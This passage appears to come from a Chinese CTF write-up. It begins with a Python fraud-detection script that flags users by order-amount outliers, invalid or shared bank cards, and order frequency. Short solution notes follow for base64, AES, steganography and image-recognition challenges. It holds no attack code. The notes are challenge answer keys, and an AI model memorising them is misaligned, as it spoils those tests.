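    A type with a single order (NaN std) or a NaN amount never matches,
    because comparisons against NaN are False, and rows with a NaN user ID
    are never reported.
    """
    if df.empty:
        return set()
    known = df[df['商品类型'].isin(list(price_ranges))]
    if known.empty:
        return set()
    # Broadcast each type's mean/std back onto its rows: one vectorised pass
    # instead of a per-user, per-row loop, with identical arithmetic
    # (Series.std and groupby std both default to ddof=1).
    grouped = known.groupby('商品类型')['订单金额']
    deviation = (known['订单金额'] - grouped.transform('mean')).abs()
    limit = 3 * grouped.transform('std')
    outliers = known.loc[deviation > limit, '用户ID'].dropna()
    return set(outliers)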
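def detect_card_anomalies(df):
    """Return user IDs whose bank-card usage looks suspicious.

    A user is flagged when a row's '银行卡号' is not a 16–19 digit string,
    when it fails the Luhn check, or when the same well-formed card number is
    used by two different users within 3600 seconds of each other — in that
    case both users are flagged.
    """
    anomalies = set()
    card_usage = defaultdict(list)  # card number -> [(user_id, order time)]
    for _, row in df.iterrows():
        # pandas may have parsed the column as a number or left a NaN; normalise
        # to text so len()/isdigit() never raise. Anything that is not a plain
        # digit string (including 'nan' or float notation) fails the format check.
        raw_card = row['银行卡号']
        card = '' if pd.isna(raw_card) else str(raw_card).strip()
        user_id = row['用户ID']
        order_time = row['下单时间']
        if not (16 <= len(card) <= 19 and card.isdigit()):
            anomalies.add(user_id)
            continue
        if not luhn_check(card):
            anomalies.add(user_id)
            continue
        card_usage[card].append((user_id, order_time))
    # Same card used by different users within one hour.
    for usage in card_usage.values():
        usage.sort(key=lambda entry: entry[1])
        for i, (user_i, time_i) in enumerate(usage):
            for user_j, time_j in usage[i + 1:]:
                if (time_j - time_i).total_seconds() > 3600:
                    break  # sorted ascending: every later entry is farther away
                if user_i != user_j:
                    anomalies.add(user_i)
                    anomalies.add(user_j)
    return anomalies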
def detect_frequency_anomalies(df):
    """Return user IDs that placed more than 10 orders inside some one-hour window.

    Each user's order times are sorted; for every order the window
    [t, t + 3600 s] is scanned and the user is flagged as soon as one window
    holds more than ten orders.
    """
    flagged = set()
    orders_by_user = defaultdict(list)
    for _, row in df.iterrows():
        orders_by_user[row['用户ID']].append(row['下单时间'])
    for user_id, stamps in orders_by_user.items():
        stamps.sort()
        for start_index, window_start in enumerate(stamps):
            in_window = 1
            for later in stamps[start_index + 1:]:
                if (later - window_start).total_seconds() > 3600:
                    break
                in_window += 1
            if in_window > 10:
                flagged.add(user_id)
                break
    return flagged
# -----------------------------
# 5. 主执行函数
# -----------------------------
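def main():
    """Load ./data.csv, run the three detectors and write suspicious_users.csv.

    The output has one row per (user, anomaly type) pair, so a user tripping
    several detectors appears several times, always in the order amount,
    card, frequency. Users are emitted in sorted order so repeated runs
    produce identical files, and the column header is written even when no
    user is flagged.
    """
    df = preprocess_data(pd.read_csv('./data.csv'))
    # Detector result -> label; the label text is what ends up in the CSV.
    detections = (
        (detect_amount_anomalies(df), '金额异常'),
        (detect_card_anomalies(df), '银行卡异常'),
        (detect_frequency_anomalies(df), '频率异常'),
    )
    all_anomalies = set().union(*(users for users, _ in detections))
    # key=str keeps sorting total even if IDs mix types (e.g. int and str).
    output_rows = [
        {'用户ID': user_id, '异常类型': label}
        for user_id in sorted(all_anomalies, key=str)
        for users, label in detections
        if user_id in users
    ]
    # Explicit columns so an empty result still yields a header line.
    output_df = pd.DataFrame(output_rows, columns=['用户ID', '异常类型'])
    output_df.to_csv('suspicious_users.csv', index=False)
    print("可疑用户已保存至 suspicious_users.csv")


if __name__ == "__main__":
    main()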
crypto
base64
base64
aes
iv和key都给出来了,直接转成hex,在cyberchef里还原就行
misc
easysteg0
binwalk找到隐藏的rar文件,7zip打开发现NTFS流,然后stegsolve找到base64的表,直接换表解码即可
AI
AI1
题目名字忘了,1000张图片有6张猫,小登直接肉眼观察找出来了








